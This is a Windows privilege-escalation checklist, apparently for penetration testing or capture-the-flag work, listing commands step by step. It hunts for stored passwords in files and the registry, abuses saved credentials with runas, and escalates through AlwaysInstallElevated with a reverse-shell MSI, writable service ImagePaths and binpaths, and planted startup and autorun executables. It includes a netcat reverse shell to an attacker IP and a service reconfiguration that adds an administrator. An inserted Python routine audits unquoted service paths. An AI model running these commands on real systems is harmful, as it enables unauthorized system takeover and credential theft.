Windows Priv Esc Check-List
“It always seems impossible until it’s done.” - Nelson Mandela
Download the PDF at the bottom of the page, then start marking off the checks for your next Windows privilege escalation phase. ;)
Check-List
Columns: Mark (checkbox), Method, Commands, Approach, ToDo.

[ ] Host Information and Enumeration
    Commands: systeminfo
    Approach: Manual
    ToDo: 1. Copy the output to your attacking machine for further use. 2. Note the architecture of the machine.

[ ] Host Information and Enumeration
    Commands:
        whoami
        whoami /groups
    Approach: Manual
    ToDo: Note if you are in the Admin group.

[ ] Host Information and Enumeration
    Commands: hostname
    Approach: Manual
    ToDo: Note the hostname and domain.

[ ] Host Information and Enumeration
    Commands: wmic logicaldisk get Caption
    Approach: Manual
    ToDo: Check all the partitions of this machine.

[ ] Host Information and Enumeration
    Commands: net user <username>
    Approach: Manual
    ToDo: Check local and global group membership.

[ ] Host Information and Enumeration
    Commands: net localgroup <username>
    Approach: Manual
    ToDo: Check local groups for a user.

[ ] Host Information and Enumeration
    Commands:
        dir /R
        more < <datastream_file>
    Approach: Manual
    ToDo: 1. Check if there is any ADS (Alternate Data Stream) file in the directory. 2. View its contents using the more command.

[ ] Hot Fixes
    Commands: wmic qfe get Caption,Description,HotFixId,InstalledOn
    Approach: Manual
    ToDo: Search for outdated HotFixes.

[ ] Network Enumeration
    Commands: ipconfig /all
    Approach: Manual
    ToDo: Check detailed info about the IP address.

[ ] Network Enumeration
    Commands: arp -a
    Approach: Manual
    ToDo: Check the arp table and all connections.

[ ] Network Enumeration
    Commands: route print
    Approach: Manual
    ToDo: Check routes.

[ ] Network Enumeration
    Commands: netstat -ano
    Approach: Manual
    ToDo: Check connections; internal and external ports can be used for port forwarding.
[ ] Password Hunting
    Commands: findstr /si password *.txt *.ini *.config *.xml
    Approach: Manual
    ToDo: Find the phrase "password" in files of the current dir.

[ ] Password Hunting
    Commands: findstr /spin "password" *.*
    Approach: Manual
    ToDo: Find the password phrase in all files.

[ ] Password Hunting
    Commands:
        c:\sysprep.inf
        c:\sysprep\sysprep.xml
        c:\unattend.xml
        %WINDIR%\Panther\Unattend\Unattended.xml
        %WINDIR%\Panther\Unattended.xml
        dir c:\*vnc.ini /s /b
        dir c:\*ultravnc.ini /s /b
        dir c:\ /s /b | findstr /si *vnc.ini
    Approach: Manual
    ToDo: Explore these files for passwords.

[ ] Password Hunting
    Commands: reg query "HKCU\Software\ORL\WinVNC3\Password"
    Approach: Manual
    ToDo: Explore the password for VNC.

[ ] Password Hunting
    Commands: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
    Approach: Manual
    ToDo: Windows Autologon.

[ ] Password Hunting
    Commands: reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
    Approach: Manual
    ToDo: SNMP parameters.

[ ] Password Hunting
    Commands: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
    Approach: Manual
    ToDo: PuTTY.

[ ] Password Hunting
    Commands:
        reg query HKLM /f password /t REG_SZ /s
        reg query HKCU /f password /t REG_SZ /s
    Approach: Manual
    ToDo: Passwords in the registry.

[ ] Firewall and AV Enumeration
    Commands: sc query windefend
    Approach: Manual
    ToDo: Service query to check Windows Defender.

[ ] Firewall and AV Enumeration
    Commands: sc queryex type= service
    Approach: Manual
    ToDo: Service query to list all services.

[ ] Firewall and AV Enumeration
    Commands:
        netsh firewall show state
        netsh advfirewall firewall dump
    Approach: Manual
    ToDo: Check firewall status.

[ ] Firewall and AV Enumeration
    Commands: netsh firewall show config
    Approach: Manual
    ToDo: Check firewall configurations.

[ ] Kernel Exploit
    Commands: winPEAS.exe (winPEAS - Tool Download: Link)
    Approach: Tool
    ToDo: Kernel vulnerabilities.

[ ] Kernel Exploit
    Commands:
        ./windows-exploit-suggester.py --update
        pip install xlrd --upgrade
        ./windows-exploit-suggester.py --database <database>.xls --systeminfo <sysinfo file>.txt
    Approach: Tool
    ToDo: 1. Download: Link. 2. Update the database. 3. Install xlrd with pip. 4. Include the updated xls and the file holding the systeminfo output.

[ ] Kernel Exploit
    Approach: Manual/Tool
    ToDo: 1. SecWiki 2. zerosum00 3. abatchy17 #precompiled 4. rasta-mouse

[ ] Unquoted Service Path
    Commands: . .\powerup.ps1
    Approach: Tool
    ToDo: Place the executable file with the first name of the directory, e.g. for C:\help\test me\service.exe place the executable as test.exe in the "help" directory to trick the system into executing that file when the service starts.

[ ] Unquoted Service Path
    Commands: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
    Approach: Manual
    ToDo: Place the executable file with the first name of the directory, e.g. for C:\help\test me\service.exe place the executable as test.exe in the "help" directory to trick the system into executing that file when the service starts.
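The path-splitting behaviour the two Unquoted Service Path rows rely on, as an added audit example (not code from the original checklist): it applies the same filter as the wmic/findstr pipeline to a constructed wmic sample, lists the paths Windows would try before the real binary (the directories whose ACLs an administrator should verify), and produces the quoted ImagePath that remediates the finding. The sample output and service names are constructed; hijack_candidates models how CreateProcess resolves an unquoted path.

```python
import re

# Constructed sample of `wmic service get name,displayname,pathname,startmode`
# output (not captured from a real host); columns are separated by 2+ spaces.
SAMPLE_WMIC = r"""
Name       DisplayName     PathName                                    StartMode
Spooler    Print Spooler   C:\Windows\System32\spoolsv.exe             Auto
HelpSvc    Help Service    C:\help\test me\service.exe                 Auto
VendorSvc  Vendor Service  "C:\Program Files\Vendor App\svc.exe" -run  Auto
OtherSvc   Other Service   C:\Program Files\Other\other agent.exe      Manual
"""

def hijack_candidates(pathname: str) -> list[str]:
    """Paths Windows tries before the real binary when the service path is
    unquoted and has spaces: the string is split at each space, .exe appended."""
    if pathname.startswith('"'):
        return []  # a quoted path is resolved as written
    parts, candidates = pathname.split(" "), []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the real binary; anything after it is arguments
        candidates.append(prefix + ".exe")
    return candidates

def quote_path(pathname: str) -> str:
    """Remediated ImagePath: executable portion in double quotes, arguments kept."""
    if pathname.startswith('"'):
        return pathname
    m = re.match(r"(?i)(.+?\.exe)(.*)", pathname)
    return f'"{m.group(1)}"{m.group(2)}' if m else f'"{pathname}"'

def find_unquoted_services(output: str) -> list[dict]:
    """Apply the checklist's findstr filter, then list the paths whose ACLs to verify."""
    lines = [ln.rstrip() for ln in output.splitlines() if ln.strip()]
    header = re.split(r"\s{2,}", lines[0].strip())
    findings = []
    for line in lines[1:]:
        fields = re.split(r"\s{2,}", line.strip())
        if len(fields) != len(header):
            continue  # malformed or wrapped line
        row = dict(zip(header, fields))
        path = row["PathName"]
        if row["StartMode"].lower() != "auto" or path.lower().startswith("c:\\windows\\"):
            continue
        cands = hijack_candidates(path)
        if cands:
            findings.append({"name": row["Name"], "path": path,
                             "candidates": cands, "quoted_path": quote_path(path)})
    return findings
```

On a real host, feed the output of the wmic command into find_unquoted_services and check with icacls whether non-administrators can write to the directory of each candidate path.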
[ ] WSL
    Commands:
        where /R c:\windows bash.exe
        where /R c:\windows wsl.exe
    Approach: Manual
    ToDo: Try to access and explore the WSL.

[ ] Check Privileges
    Commands: whoami /priv
    Approach: Manual
    ToDo: 1. Check which privileges the current user has for token impersonation. 2. Does it have SeImpersonate or SeAssignPrimaryToken? If yes, try the Juicy Potato attack. 3. Else, understand the privileges from this link.

[ ] Check Privileges
    Commands:
        reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
        reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    Approach: Manual
    ToDo: This will work only if both registry keys have the value "AlwaysInstallElevated" set to DWORD 1, which allows installing an .MSI as SYSTEM.

[ ] Check Privileges
    Commands:
        cmdkey /list
        C:\Windows\System32\runas.exe /user:<username>\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE <C:\Users\Administrator\Desktop\root.txt> > <output_file_in_writable_dir>"
    Approach: Manual
    ToDo: 1. List currently stored creds of administrator users, if any exist. 2. Run cmd as that user.

[ ] Autorun
    Commands:
        C:\Users\User\Desktop\Tools\Autorun\Autorun64.exe
        C:\Users\User\Desktop\Tools\Accesschk\Accesschk64.exe -wvu "<Interesting_program>"
    Approach: Manual
    ToDo: 1. Download, copy and run the file on the compromised machine. 2. Find an interesting program running. 3. Download Accesschk and run it. 4. Replace that autorun file with reverse.exe.

[ ] PowerUp
    Commands:
        powershell -ep bypass
        . .\PowerUp.ps1
        Invoke-AllChecks
    Approach: Tool
    ToDo: Analyze the output.

[ ] AlwaysInstallElevated
    Commands:
        reg query HKLM\Software\Policies\Microsoft\Windows\Installer
        msiexec /i "path.msi"
    Approach: Manual
    ToDo: 1. If the value is 0x1, it is on. 2. Create reverse.msi and a listening nc. 3. Install the msi.

[ ] Service Escalation
    Commands:
        powershell -ep bypass
        Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc
        x86_64-w64-mingw32-cc windows_service.c -o x.exe
        reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
        sc start regsvc
    Approach: Manual
    ToDo: 1. Check for FullControl with the powershell command. 2. Install the mingw lib: sudo apt install gcc-mingw-w64. 3. Compile the code for the windows service (pending to attach file). 4. Add the registry value and execute. 5. Start the regsvc service. 6. User added. 7. Login as the user.

[ ] Services As Executable
    Commands:
        powershell -ep bypass
        . .\powerup.ps1
    Approach: Manual
    ToDo: 1. Use PowerUp.ps1 to find a service which runs an executable (pending to attach file). 2. Replace the executable.

[ ] Startup Applications
    Commands: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    Approach: Manual
    ToDo: 1. Check if the current user has (F) full access to the startup dir. 2. Put reverse.exe in the folder. 3. Logout and login.
[ ] Binary Path
    Commands:
        accesschk64.exe -uwcv Everyone *
        accesschk64.exe -uwcv <service_name>
        sc qc <service_name>
        sc config <service_name> binpath= "net localgroup administrators <user> /add"  (or binpath= "nc.exe <attacker_ip> <port> -e cmd.exe")
        sc start <service_name>
        net localgroup administrators
    Approach: Manual
    ToDo: 1. Find rw access for a service name with the Everyone group. 2. Check if you can change the configuration. 3. Add the user to the administrators group. 4. Start the service. 5. Check the local group to see if you are added to the Admin group.

[ ] Manual Enum
    Approach: Manual
    ToDo: 1. Check files in Program Files. 2. Try to understand and exploit the existing software.
Author - Bhashit Pandya
https://twitter.com/x30r_